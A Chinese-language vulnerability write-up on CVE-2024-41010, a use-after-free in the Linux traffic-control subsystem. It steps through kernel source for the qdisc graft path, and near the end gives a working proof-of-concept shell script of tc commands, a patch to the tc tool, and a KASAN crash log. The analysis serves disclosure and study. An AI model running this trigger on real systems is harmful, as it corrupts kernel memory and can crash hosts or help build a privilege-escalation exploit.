Introduction

Linux Traffic Control (net/sched) 是一個能控制網路流量的 subsystem,其提供使用者多種不同的 scheduler (qdisc) 來做流量控管,像是 ingress 以及 clsact。bpf: Fix too early release of tcx_entry (CVE-2024-41010) 即是一個出現在 net/sched subsystem、因為過早釋放 tcx_entry object 而導致的 UAF 漏洞。

Commit log 已經有詳細的文字說明,因此接下來主要由程式碼來分析該漏洞,讀者可以參考下方提供 ingress/clsact qdisc 的結構 overview 來了解 private data 與 tcx_entry object 之間的關係。

image-20240724130453866

image-20240724130442427

Root Cause

1. Initialize Ingress Qdisc

當新增一個 ingress qdisc 時,分別會建立 bpf_mprog_entry object [1] 與 tcf_block object [2],此外也會初始化 mini queue pointer,使其指向 tcx_entry object 的成員 miniq [3]。如果 bpf_mprog_entry object 是新建立的話,也會將其 bind 到 net_device object 上 (dev->tcx_ingress) [4]。

static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
            struct netlink_ext_ack *extack)
{
    struct ingress_sched_data *q = qdisc_priv(sch);
    struct net_device *dev = qdisc_dev(sch);
    struct bpf_mprog_entry *entry;
    
    // [...]
    entry = tcx_entry_fetch_or_create(dev, true, &created); // [1]
    tcx_miniq_set_active(entry, true);
    
    mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // [3]
    tcx_entry_update(dev, entry, true); // [4]
    
    err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack); // [2]
    // [...]
}

如果在建立 block 時給一個不為 0 的 index [5],這個 block 就被視為 shared block,並且另外由 network object tcf_net 底下的 idr table 紀錄一份 [6]。

int tcf_block_get_ext(struct tcf_block **p_block, struct Qdisc *q,
              struct tcf_block_ext_info *ei,
              struct netlink_ext_ack *extack)
{
    struct net *net = qdisc_net(q);
    struct tcf_block *block = NULL;
    int err;

    if (ei->block_index) // [5]
        block = tcf_block_refcnt_get(net, ei->block_index);

    if (!block) {
        block = tcf_block_create(net, q, ei->block_index, extack);
        // [...]
        if (tcf_block_shared(block)) {
            err = tcf_block_insert(block, net, extack); // [6]
        }
    }
    // [...]
}

2. Attach Chain0 to Block1

tc_ctl_chain() 會為指定 index 的 block 新增 chain,並且當 chain index 為 0 時 [1],這個 chain 會被視為是 block 的 chain head,也就是 chain0 [2]。

static struct tcf_chain *tcf_chain_create(struct tcf_block *block,
                      u32 chain_index)
{
    struct tcf_chain *chain;
    chain = kzalloc(sizeof(*chain), GFP_KERNEL);
    // [...]
    chain->refcnt = 1;
    if (!chain->index) // [1]
        block->chain0.chain = chain; // [2]
    return chain;
}

3. Graft Clsact Qdisc to Old One

tc_modify_qdisc() 在滿足一些條件下可以接受 replace 時兩個不同類型的 qdisc,而如果請求的 class id 為 TC_H_INGRESS,就會先建一個 qdisc object [1],並在最後 graft (replace) 掉舊的 [2]。

static int tc_modify_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
               struct netlink_ext_ack *extack)
{
    // [...]
    if (clid == TC_H_INGRESS) {
        if (dev_ingress_queue(dev)) {
            q = qdisc_create(dev, dev_ingress_queue(dev), // [1]
                     tcm->tcm_parent, tcm->tcm_parent,
                     tca, &err, extack);
        }
        // [...]
    }
    err = qdisc_graft(dev, p, skb, n, clid, q, NULL, extack); // [2]
    // [...]
}

初始化 clsact qdisc 的流程大致上與 ingress 相同,但是因為在步驟 “1. Initialize Ingress Qdisc” 已經建好相關的 object,因此這邊會拿到與 ingress 相同的 tcx_entry object [3] 以及 shared tcf_block object [4]。

static int clsact_init(struct Qdisc *sch, struct nlattr *opt,
               struct netlink_ext_ack *extack)
{
    entry = tcx_entry_fetch_or_create(dev, true, &created); // [3]
    // [...]
    mini_qdisc_pair_init(&q->miniqp_ingress, sch, &tcx_entry(entry)->miniq);
    // [...]
    err = tcf_block_get_ext(&q->ingress_block, sch, &q->ingress_block_info, // [4]
                extack);
    // [...]
}

後續在 qdisc_graft() 處理 graft 時,會呼叫 qdisc_destroy() 把舊的 ingress qdisc 刪掉,會在走到 ingress_destroy()。然而該 function 卻直接把 bpf_mprog_entry object 設成 inactive [5] 並且釋放掉 [6],但實際上新的 clsact 仍可以透過 miniqp_ingress 來 reference 到,因此造成 UAF

static void ingress_destroy(struct Qdisc *sch)
{
    // [...]
    struct bpf_mprog_entry *entry = rtnl_dereference(dev->tcx_ingress);
    // [...]
    if (entry) {
        tcx_miniq_set_active(entry, false); // [5]
        if (!tcx_entry_is_active(entry)) {
            tcx_entry_update(dev, NULL, true);
            tcx_entry_free(entry); // [6]
        }
    }
    // [...]
}

POC

#!/bin/sh

unshare -n sh -c """
./network-tools/ip link set lo up
./network-tools/tc qdisc add dev lo ingress_block 1 handle ffff: ingress
./network-tools/tc chain add block 1
./tc qdisc replace dev lo ingress_block 1 handle 1234: clsact
sleep 1 # wait RCU
"""

./network-tools/tc 為正常的 tc tool,而 ./tc 需要 patch tc tool,不然沒有辦法任意控制 handle value:

--- tc/tc_qdisc.c    2024-07-24 11:36:42.702698210 +0800
+++ tc/tc_qdisc_orig.c       2024-07-24 11:36:38.414843027 +0800
@@ -92,7 +92,7 @@
                        req.t.tcm_parent = TC_H_CLSACT;
                        strncpy(k, "clsact", sizeof(k) - 1);
                        q = get_qdisc_kind(k);
-                       // req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
+                       req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
                        NEXT_ARG_FWD();
                        break;
                } else if (strcmp(*argv, "ingress") == 0) {

下方為觸發漏洞時的 KASAN 錯誤資訊:

[   44.560441] BUG: KASAN: slab-use-after-free in mini_qdisc_pair_swap+0x26/0xb0
[   44.561275] Read of size 8 at addr ffff888003fd8000 by task kworker/u2:1/28
[   44.561660]
[   44.561930] CPU: 0 PID: 28 Comm: kworker/u2:1 Not tainted 6.7.0-rc3 #13
[   44.562174] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014
[   44.562546] Workqueue: netns cleanup_net
[   44.563162] Call Trace:
[   44.563336]  <TASK>
[   44.563498]  dump_stack_lvl+0x32/0x40
[   44.563683]  print_report+0xcf/0x660
[   44.563828]  ? __virt_addr_valid+0xd0/0x150
[   44.563984]  ? mini_qdisc_pair_swap+0x26/0xb0
[   44.564130]  kasan_report+0xbe/0xf0
[   44.564275]  ? mini_qdisc_pair_swap+0x26/0xb0
[   44.564413]  mini_qdisc_pair_swap+0x26/0xb0
[   44.564552]  ? clsact_egress_block_get+0x20/0x20
[   44.564693]  tcf_chain0_head_change_cb_del+0xc7/0x180
[   44.564869]  tcf_block_put_ext+0x1a/0x50
[   44.565020]  clsact_destroy+0x96/0x3c0
[   44.565156]  ? qdisc_reset+0x1ab/0x1c0
[   44.565300]  __qdisc_destroy+0x54/0xc0
[   44.565430]  dev_shutdown+0x100/0x170
[   44.565568]  unregister_netdevice_many_notify+0x2e0/0xb00
[   44.565764]  ? netdev_freemem+0x30/0x30
[   44.565899]  ? unregister_netdevice_queue+0xb7/0x150
[   44.566057]  ? unregister_netdevice_many+0x10/0x10
[   44.566210]  ? mutex_is_locked+0x16/0x30
[   44.566345]  default_device_exit_batch+0x28b/0x310
[   44.566495]  ? unregister_netdev+0x20/0x20
[   44.566643]  ? cfg80211_switch_netns+0x2c0/0x2c0
[   44.566814]  cleanup_net+0x2c2/0x4b0
[   44.566955]  ? peernet2id+0x40/0x40
[   44.567077]  ? read_word_at_a_time+0xe/0x20
[   44.567212]  ? kick_pool+0x32/0x170
[   44.567329]  process_one_work+0x2b6/0x490
[   44.567479]  worker_thread+0x544/0x7d0
[   44.567621]  ? process_one_work+0x490/0x490
[   44.567762]  kthread+0x16d/0x1b0
[   44.567887]  ? kthread_complete_and_exit+0x20/0x20
[   44.568030]  ret_from_fork+0x28/0x50
[   44.568149]  ? kthread_complete_and_exit+0x20/0x20
[   44.568265]  ret_from_fork_asm+0x11/0x20
[   44.568424]  </TASK>
[   44.568562]
[   44.568634] Allocated by task 52:
[   44.569640]
[   44.569702] Freed by task 8:
[   44.570345]
[   44.570419] Last potentially related work creation:
[   44.571289]
[   44.571364] The buggy address belongs to the object at ffff888003fd8000
[   44.571364]  which belongs to the cache kmalloc-2k of size 2048
[   44.571655] The buggy address is located 0 bytes inside of
[   44.571655]  freed 2048-byte region [ffff888003fd8000, ffff888003fd8800)
[   44.571884]
[   44.572004] The buggy address belongs to the physical page:
[   44.573148]
[   44.573211] Memory state around the buggy address:
[   44.573455]  ffff888003fd7f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   44.573628]  ffff888003fd7f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   44.573883] >ffff888003fd8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574048]                    ^
[   44.574185]  ffff888003fd8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574354]  ffff888003fd8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574513] ==================================================================